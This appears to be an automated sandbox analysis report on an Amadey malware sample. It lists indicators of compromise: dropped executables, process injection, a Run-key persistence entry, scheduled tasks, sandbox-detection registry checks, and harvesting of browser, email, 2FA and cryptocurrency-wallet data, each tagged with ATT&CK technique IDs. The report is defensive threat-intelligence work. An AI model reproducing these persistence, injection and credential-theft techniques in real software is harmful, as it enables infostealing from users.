amadey | 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	8221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	8221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	677E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	A50F.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	A50F.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	677E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	9155.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	oldplayer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 64 IoCs

pid	Process
1788	80F7.exe
5064	8221.exe
2296	8221.exe
3636	8221.exe
3860	9155.exe
1144	build3.exe
3944	8221.exe
4708	schtasks.exe
5140	ss31.exe
5228	oldplayer.exe
5472	A50F.exe
5520	XandETC.exe
5920	oneetx.exe
5200	A50F.exe
5840	A50F.exe
5884	build2.exe
1144	build3.exe
5452	CAE7.exe
5412	build2.exe
3348	A50F.exe
5416	powershell.exe
2964	build2.exe
5640	build2.exe
5836	oneetx.exe
2964	build2.exe
4088	build3.exe
644	mstsca.exe
5700	updater.exe
5940	85CE.exe
3988	oneetx.exe
1684	oneetx.exe
2348	oneetx.exe
5968	oneetx.exe
4424	oneetx.exe
4352	oneetx.exe
1092	WerFault.exe
4592	oneetx.exe
5784	vhidrbj
4808	cdidrbj
428	oneetx.exe
1144	oneetx.exe
5860	677E.exe
880	677E.exe
4576	677E.exe
5820	8567.exe
1076	677E.exe
5164	8DA5.exe
1988	9651.exe
432	build2.exe
5384	build3.exe
1536	build2.exe
5496	oneetx.exe
3364	oneetx.exe
5800	oneetx.exe
5788	oneetx.exe
1504	oneetx.exe
3568	oneetx.exe
5660	oneetx.exe
3816	vhidrbj
3908	oneetx.exe
4152	cdidrbj
4428	oneetx.exe
4584	oneetx.exe
5796	oneetx.exe

Loads dropped DLL 6 IoCs

pid	Process
5412	build2.exe
5412	build2.exe
2964	build2.exe
2964	build2.exe
1536	build2.exe
1536	build2.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3188	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1284-2506-0x00007FF652FD0000-0x00007FF6537C4000-memory.dmp	upx
behavioral2/memory/1284-2731-0x00007FF652FD0000-0x00007FF6537C4000-memory.dmp	upx

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	dllhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dllhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dllhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	dllhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	dllhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	dllhost.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\9eacb941-f28f-46b9-ac44-1830dd5f5713\\8221.exe\" --AutoStart"	8221.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
205	api.2ip.ua
907	api.2ip.ua
914	api.2ip.ua
1008	api.2ip.ua
1020	api.2ip.ua
126	api.2ip.ua
166	api.2ip.ua
968	api.2ip.ua
969	api.2ip.ua
1007	api.2ip.ua
1021	api.2ip.ua
257	api.2ip.ua
906	api.2ip.ua

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 5064 set thread context of 2296	5064	8221.exe	106
PID 3636 set thread context of 3944	3636	8221.exe	111
PID 5472 set thread context of 5200	5472	A50F.exe	122
PID 5884 set thread context of 5412	5884	build2.exe	131
PID 5840 set thread context of 3348	5840	A50F.exe	132
PID 5640 set thread context of 2964	5640	build2.exe	144
PID 5700 set thread context of 5520	5700	updater.exe	214
PID 5700 set thread context of 1284	5700	updater.exe	220
PID 5860 set thread context of 880	5860	677E.exe	271
PID 4576 set thread context of 1076	4576	677E.exe	274
PID 432 set thread context of 1536	432	build2.exe	284
PID 6020 set thread context of 2248	6020	8221.exe	320
PID 5160 set thread context of 5940	5160	8221.exe	338
PID 5052 set thread context of 4632	5052	8221.exe	348

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Notepad\Chrome\updater.exe	conhost.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5736	sc.exe
3568	sc.exe
4100	sc.exe
4912	sc.exe
1428	sc.exe
4648	sc.exe
3188	sc.exe
5248	sc.exe
2652	sc.exe
3776	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 11 IoCs

pid	pid_target	Process	procid_target
5828	4708	WerFault.exe	113
5800	5452	WerFault.exe
5256	2964	WerFault.exe	135
5556	1788	WerFault.exe	104
5948	5940	WerFault.exe	185
1128	5820	WerFault.exe	273
5460	1988	WerFault.exe	278
4948	1536	WerFault.exe	284
1092	2328	WerFault.exe	253
5584	64	WerFault.exe	12
5368	3816	WerFault.exe	301

Checks SCSI registry key(s) 3 TTPs 33 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8DA5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8DA5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8DA5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	build3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vhidrbj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	build3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	build3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cdidrbj
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dllhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	grpconv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	grpconv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	dllhost.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3644	schtasks.exe
4708	schtasks.exe
5076	schtasks.exe
2184	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1304	timeout.exe
5572	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
648	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
648	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious behavior: MapViewOfSection 9 IoCs

pid	Process
648	5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
1144	build3.exe
5416	powershell.exe
4808	cdidrbj
5784	vhidrbj
5164	8DA5.exe
4152	cdidrbj
1628	cdidrbj
5800	vhidrbj

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

pid	Process
1244	3768.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3136	firefox.exe
Token: SeDebugPrivilege	3136	firefox.exe
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeDebugPrivilege	1044	firefox.exe
Token: SeShutdownPrivilege	752	Explorer.EXE
Token: SeCreatePagefilePrivilege	752	Explorer.EXE
Token: SeShutdownPrivilege	5268	WerFault.exe
Token: SeCreatePagefilePrivilege	5268	WerFault.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeShutdownPrivilege	5556	WerFault.exe
Token: SeCreatePagefilePrivilege	5556	WerFault.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeShutdownPrivilege	5720	powercfg.exe
Token: SeCreatePagefilePrivilege	5720	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1916	powershell.exe
Token: SeSecurityPrivilege	1916	powershell.exe
Token: SeTakeOwnershipPrivilege	1916	powershell.exe
Token: SeLoadDriverPrivilege	1916	powershell.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
3136	firefox.exe
3136	firefox.exe
3136	firefox.exe
3136	firefox.exe
752	Explorer.EXE
5228	oldplayer.exe
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
3136	firefox.exe
3136	firefox.exe
3136	firefox.exe
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE
752	Explorer.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3136	firefox.exe
752	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 4392 wrote to memory of 3136	4392	firefox.exe	89
